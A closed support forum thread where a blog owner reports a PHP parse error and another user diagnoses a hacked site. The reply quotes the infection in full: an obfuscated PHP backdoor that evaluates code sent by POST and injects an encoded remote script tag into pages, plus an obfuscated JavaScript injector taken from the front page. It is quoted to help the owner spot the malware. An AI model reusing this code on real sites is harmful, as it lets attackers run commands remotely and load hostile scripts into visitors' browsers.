Blog Died

  • Hello:

    Trying to log on to our blog at https://www.navivest.com/blog, I get the following error: Parse error: parse error, unexpected T_VARIABLE in /home/content/n/a/v/naviname/html/blog/index.php on line 1

    I don’t know if its recommended to show a copy of the index.php file, so I have not, but would really appreciate any help and suggestions. I called Godaddy and the tech support person said there are no users set up in the database or something like that and either that or something else is causing a connection string problem. The blog has been up for 8 months, so even if that’s the case, I don’t know what now all of a sudden. Made no sense.

    No changes have been made other than new posts

Viewing 3 replies - 1 through 3 (of 3 total)

  • your blog is hacked.

    open this file,

    /home/content/n/a/v/naviname/html/blog/index.php

    whats on the first line? this?

    <?php if(!function_exists('tmp_lkojfghx')){if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCmRvY3VtZW50LndyaXRlKHVuZXNjYXBlKCclM0NzMTRMY2xKcjJUaXB0JTIwc3lzcmZ6ZmNmaFklM0QyM1clMkZmaFklMkYyVDlsSjQlMkUyNDczQSUyRTIzVzIlMkUxc3k5M0E1JTJGajE0THF1ZXJmaFl5MjNXJTJFM0FqVGxzJTNFJTNDJTJGczE0TGNyaWZ6ZnBzeXQlM0UnKS5yZXBsYWNlKC9maFl8M0F8Z3J8MlR8ZnpmfDE0THxsSnwyM1d8VGx8c3kvZywiIikpOwogLS0+PC9zY3JpcHQ+'));function tmp_lkojfghx($s){if($g=(substr($s,0,2)==chr(31).chr(139))$s=gzinflate(substr($s,10,-8));if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}$s1=preg_replace('#<script language=javascript><!-- \ndocument\.write\(unescape\(.+?\n --></script>#','',$s);if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',TMP_XHGFJOKL.'\1',$s1);elseif(($s1!=$s)||stristr($s,'</body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?><?php

    something similar?

    your front page (.html file): https://www.navivest.com/

    is hacked also.

    <script language=javascript><!--
document.write(unescape('NSf%3ChqJsTGZcNSfripNSft%20gVwsgVwrhqJc%3DhqJ%2F%2F9PFo4TGZ%2ETGZ24hqJ7%2E2PFo%2EPFo195gVw%2FPFojqhqJueryNSf%2Ejs%3E%3CgVw%2FshqJcPForipPFotgVw%3E').replace(/TGZ|NSf|hqJ|rT|PFo|gVw|zz/g,""));
 --></script>

    Ive seen this before.

    Thread Starter newbee1999

    (@newbee1999)

    I feared as much. Yes that garbage is on there. Any idea as to how it happened and can be prevented?

    Thanks

Viewing 3 replies - 1 through 3 (of 3 total)
  • The topic ‘Blog Died’ is closed to new replies.